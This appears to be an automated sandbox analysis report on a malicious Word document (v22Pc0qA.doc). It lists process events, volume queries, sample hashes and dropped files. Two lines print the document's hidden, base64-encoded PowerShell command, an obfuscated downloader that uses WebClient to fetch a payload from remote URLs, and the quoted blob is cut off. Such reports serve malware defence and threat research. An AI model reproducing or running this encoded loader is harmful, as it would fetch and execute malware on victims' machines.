Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

ID:	347028
Product:	CloudBasic
Start time:	23:17:26
Start date:	01.02.2021
Sample:	v22Pc0qA.doc.part
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	7a7d325948481b0557b035249bf5c96a
SHA1:	0529727ffad8388fc94155d1652ca65189cda5df
SHA256:	47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919
Filetype:	Microsoft Word document (32009/1) 54.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, 59134 bytes, 1 file	E92176B0889CC1BB97114BEB2F3C1728	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A	data	D4AE187B4574036C2D76B6DF8A8C1A30	B06F409FA14BAB33CBAF4A37811B8740B624D9E5	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	01C96E3016D3AF70BA00DE7E8D2BF065	7378216B20D79AAA888718D6D67F75ECBBD23844	E27DB22B829833E8A173F72416126E5EAAD77F6DE965CC1520F0D90D869D9F5B
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A	data	A5FD641BC4A0D1A78D07A1E8D23DAD78	09E7EAF079726D1EC00E3FF658B4D3394D532A70	18B28B1A452FF7B8A1AA0AE23BFA62F7F48D76F61514791F7E255AC47195FC6E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{438FF120-FFD8-4816-B513-C2DC6937B540}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AA0F645-B329-43DD-B4C5-CD1B0F0382FA}.tmp	data	4304A5424E9C13882063E026F3C316EE	58F488B15562AFFDE61710ADEEAF74FAC1BCD538	71F6D0539A61B2460763F125A844BB5AA0601F8E1B5CC38A1562F62D25E0A9EA
C:\Users\user\AppData\Local\Temp\Cab788B.tmp	Microsoft Cabinet archive data, 59134 bytes, 1 file	E92176B0889CC1BB97114BEB2F3C1728	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
C:\Users\user\AppData\Local\Temp\Tar788C.tmp	data	64FEDADE4387A8B92C120B21EC61E394	15A2673209A41CCA2BC3ADE90537FE676010A962	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd	data	B75724FCB4E76EBF63DBCDF7612FC119	7C17F2418772BAAED48E5506F1F8AC846FBBFA30	584E3002D3D0FAE1CE129F6ACAA0C46A7AB2BCE8AE3B36F98703F1C0B56F232B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	D9D81D211C7D3FE392C07C615275BBC8	D0AFA7424E42C91595D6AF3178CEB8118A742FC4	8CA00953A5C409D8B6B2344A7DCD452A1A25A1F94E1034B2504919FFD123A8EB
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v22Pc0qA.doc.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Feb 2 06:17:33 2021, mtime=Tue Feb 2 06:17:33 2021, atime=Tue Feb 2 06:17:36 2021, length=207360, window=hide	5446B895630089FCED67C28088FADEC7	BCC01829E557F5E5FBFD25BB80EA101900974D77	4780B9075645E765B879672F5489FB8E4739B56EA16AF51D7BB70CC14A58FAD1
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	4A5DFFE330E8BBBF59615CB0C71B87BE	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VS2UV89W85XGVX955105.temp	data	3F4EF43F42C0D4B94BFE3ECAB2F814FC	1395EAC13F983A7320D7761424C9EDA4B3B71CB2	AF180C76A745AF34EF2BBBC596E3AC3A0D9C83E98AB86DA4CE685B7AAE4ED436
C:\Users\user\Desktop\~$2Pc0qA.doc.doc	data	4A5DFFE330E8BBBF59615CB0C71B87BE	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215

Analysis Report v22Pc0qA.doc.part

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs